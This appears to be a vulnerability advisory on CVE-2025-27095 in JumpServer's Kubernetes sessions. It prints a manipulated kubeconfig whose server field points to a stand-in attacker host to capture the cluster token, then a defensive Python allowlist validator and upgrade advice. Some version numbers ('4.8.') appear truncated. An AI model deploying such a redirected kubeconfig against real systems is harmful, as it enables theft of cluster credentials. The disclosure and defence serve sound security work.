JumpServer is a popular open-source bastion host and operation and maintenance security audit system, which plays a critical role in maintaining and securing the IT infrastructure of many organizations. Recently a vulnerability was disclosed, CVE-2025-27095, which affects JumpServer versions before 4.8. and 3.10.18. By exploiting it, attackers can gain unauthorized access to a Kubernetes cluster managed through JumpServer and potentially compromise its security.

Exploit Details

The vulnerability is centered around the Kubernetes session feature in JumpServer. An attacker with a low-privileged account can manipulate the kubeconfig file used for the session so that API requests are redirected to an external server under the attacker's control. Because the session then sends the cluster's bearer token to that server, the attacker can intercept and capture the Kubernetes cluster token and use it to gain unauthorized access to the cluster.

Here's an example of a manipulated kubeconfig file, with the server field pointing at the attacker's host instead of the real API server:

apiVersion: v1
kind: Config
clusters:
- cluster:
    server: https://attacker-controlled-server/
  name: vulnerable-k8s
contexts:
- context:
    cluster: vulnerable-k8s
    user: demo-user
  name: demo-user@vulnerable-k8s
current-context: demo-user@vulnerable-k8s
users:
- name: demo-user
  user:
    token: <captured_kubernetes_cluster_token>
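
The defensive counterpart to the manipulated file above, as an added example that is not JumpServer's own code: before a session uses a kubeconfig, validate every cluster's server field against an allowlist of API-server hosts the bastion is permitted to reach, so a rewritten endpoint is rejected instead of receiving the token. The allowlist hosts, the helper name and the sample config (the post's kubeconfig as the dict yaml.safe_load would return) are all constructed for this example.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist of API-server hosts this bastion may contact (constructed).
ALLOWED_API_HOSTS = {"k8s-prod.internal.example:6443", "k8s-dev.internal.example:6443"}


def check_kubeconfig(config, allowed_hosts=ALLOWED_API_HOSTS):
    """Return a list of findings for a parsed kubeconfig; empty means acceptable."""
    findings = []
    clusters = {c.get("name"): c.get("cluster", {}) for c in config.get("clusters", [])}
    contexts = {c.get("name"): c.get("context", {}) for c in config.get("contexts", [])}

    # The active context must resolve to a cluster that is actually defined.
    current = config.get("current-context")
    if current not in contexts:
        findings.append(f"current-context {current!r} is not defined")
    elif contexts[current].get("cluster") not in clusters:
        findings.append(f"context {current!r} references an undefined cluster")

    # Every cluster endpoint must be HTTPS, on an approved host, with TLS verification on.
    for name, cluster in clusters.items():
        server = cluster.get("server", "")
        url = urlsplit(server)
        if url.scheme != "https":
            findings.append(f"cluster {name!r}: non-https server {server!r}")
        if url.netloc not in allowed_hosts:
            findings.append(f"cluster {name!r}: host {url.netloc!r} is not an approved API endpoint")
        if cluster.get("insecure-skip-tls-verify"):
            findings.append(f"cluster {name!r}: TLS verification is disabled")
    return findings


# Constructed sample mirroring the manipulated kubeconfig shown in the post.
MANIPULATED = {
    "apiVersion": "v1", "kind": "Config",
    "clusters": [{"name": "vulnerable-k8s",
                  "cluster": {"server": "https://attacker-controlled-server/"}}],
    "contexts": [{"name": "demo-user@vulnerable-k8s",
                  "context": {"cluster": "vulnerable-k8s", "user": "demo-user"}}],
    "current-context": "demo-user@vulnerable-k8s",
    "users": [{"name": "demo-user", "user": {"token": "<placeholder-token>"}}],
}

if __name__ == "__main__":
    for finding in check_kubeconfig(MANIPULATED):
        print("REJECT:", finding)
```

Running the block rejects the sample with one finding, because attacker-controlled-server is not an approved API endpoint.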

Mitigation and Fix

The developers of JumpServer have already patched this vulnerability in versions 4.8. and 3.10.18. If you are running an older version of JumpServer, it is highly recommended to update to the latest version, which contains the fix:

- Download JumpServer v4.8.
- Download JumpServer v3.10.18

Conclusion

CVE-2025-27095 is a serious vulnerability in JumpServer that potentially allows unauthorized access to Kubernetes clusters and the compromise of their security. Make sure to update your JumpServer instance to version 4.8. or 3.10.18 to protect your environment from this vulnerability. Stay safe, secure, and maintain vigilance.

Timeline

Published on: 03/31/2025 16:15:23 UTC
Last modified on: 04/01/2025 20:26:22 UTC